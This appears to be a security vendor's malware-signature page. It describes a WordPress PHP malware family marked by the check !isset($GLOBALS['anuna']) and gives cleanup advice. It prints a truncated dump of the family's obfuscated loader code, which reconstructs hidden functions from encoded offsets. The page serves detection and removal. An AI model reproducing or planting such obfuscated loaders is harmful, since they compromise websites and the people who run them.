This is wide family of different malwares known for having a common condition to be set in order to run the malicious content, which is: !isset($GLOBALS["anuna"]). This could be indicator of same author or hacker group.
The malicious payload varies from spam injections, backdoors, creating rogue admin users and many other malicious techniques. It's also often highly obfuscated to prevent the analysis.
Affecting
Vulnerable WordPress installations
Cleanup
Cleanup is done by deleting the malicious code from the file, or replacing it with a fresh version. The infection can be found in your system by searching for the malicious string inside your files.
You can also sign up with us and let our team remove the malware for you.
Dump
$ajzlrv=explode(chr((572-452)),substr($fkuwigs,(18352-12332),(191-157))); $eamkyjrgi = $ajzlrv[0]($ajzlrv[(3-2)]); $kmeteptj = $ajzlrv[0]($ajzlrv[(7-5)]); if (!function_exists('xmsbra')) { function xmsbra($giipkgs, $zdxikq,$iparun) { $jrckbikt = NULL; for($ausvsq=0;$ausvsq<(sizeof($giipkgs)/2);$ausvsq++) { $jrckbikt .= substr($zdxikq, $giipkgs[($ausvsq*2)],$giipkgs[($ausvsq*2)+(3-2)]); } return $iparun(chr((39-30)),chr((334-242)),$jrckbikt); }; } $ercyuq = explode(chr((265-221)),'1771,26,2332,21,4581,54,237,25,3167,44,5961,59,1517,65,5187,69,5489,40,262,53,5552,53,4716,28,2981,49,554,39,2205,63,3235,35,1850,39,4771,45,3657,46,4816,67,3703,30,3596,61,378,38,4402,44,4163,50,1651,50,3733,36,5833,25,1300,60,5739,57,5447,42,94,70,2005,70,5044,40,3451,64,5347,37,63,31,4949,23,3911,25,1220,27,3336,22,1413,41,9